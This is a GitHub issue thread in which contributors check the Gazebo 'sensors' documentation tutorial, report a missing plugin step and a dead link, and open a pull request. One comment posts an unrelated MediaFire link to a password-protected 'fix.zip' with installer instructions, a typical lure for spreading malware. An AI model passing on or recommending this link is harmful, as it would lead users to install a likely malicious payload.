gazebosim/gazebo_test_cases #1050: docs: sensors

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/sensors)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/sensors.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

avanmalleghem, 2024-09-02:
Interested in !

avanmalleghem, 2024-09-03:
- Add this to the tutorial : "don't forget to enable the Key Publisher plugin"
- This link is dead : https://gazebosim.org/api/transport/9.0/messages.html
- Code for lidar node has been updated !

Otherwise, everything works as expected. Will create a PR soon.

avanmalleghem, 2024-09-03:
PR opened : https://github.com/gazebosim/docs/pull/495

closed 2024-09-03 by iche033